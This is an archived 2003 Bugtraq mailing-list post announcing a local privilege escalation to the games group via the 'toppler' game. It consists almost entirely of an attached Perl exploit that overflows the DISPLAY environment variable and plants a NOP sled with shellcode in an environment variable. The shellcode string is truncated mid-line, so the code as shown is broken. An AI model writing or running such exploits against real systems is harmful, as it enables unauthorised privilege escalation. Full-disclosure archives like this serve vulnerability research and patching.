[29110] in bugtraq

gid games via toppler

daemon@ATHENA.MIT.EDU (Knud Erik Højgaar)
Sun Mar 2 17:22:16 2003

Message-ID: <000f01c2e0be$2679a6b0$24029dd9@tuborg>
From: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk>
To: <bugtraq@securityfocus.com>
Date: Sun, 2 Mar 2003 14:18:00 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_000C_01C2E0C6.87F03CD0"

------=_NextPart_000_000C_01C2E0C6.87F03CD0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Attached file should be self-explanatory.

--
kokanin/dtors/knud
------=_NextPart_000_000C_01C2E0C6.87F03CD0
Content-Type: application/octet-stream;
	name="DSR-toppler.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="DSR-toppler.pl"

#!/usr/bin/perl
#kokanin@dtors.net playing a game
#hi bob
$len =3D 1024;
$ret =3D 0xbfbffd31;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9=
\x9d;

if (@ARGV =3D=3D 1) {
    $offset =3D $ARGV[0];
}
 =20
for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .=3D $nop;
}
=20
$buffer .=3D $shellcode;

$new_ret =3D pack('l', ($ret + $offset));
=20
for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) {
    $buffer .=3D $new_ret;
}

local($ENV{'EGG'}) =3D $buffer;=20
local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20

exec("toppler 2>/dev/null");
------=_NextPart_000_000C_01C2E0C6.87F03CD0--

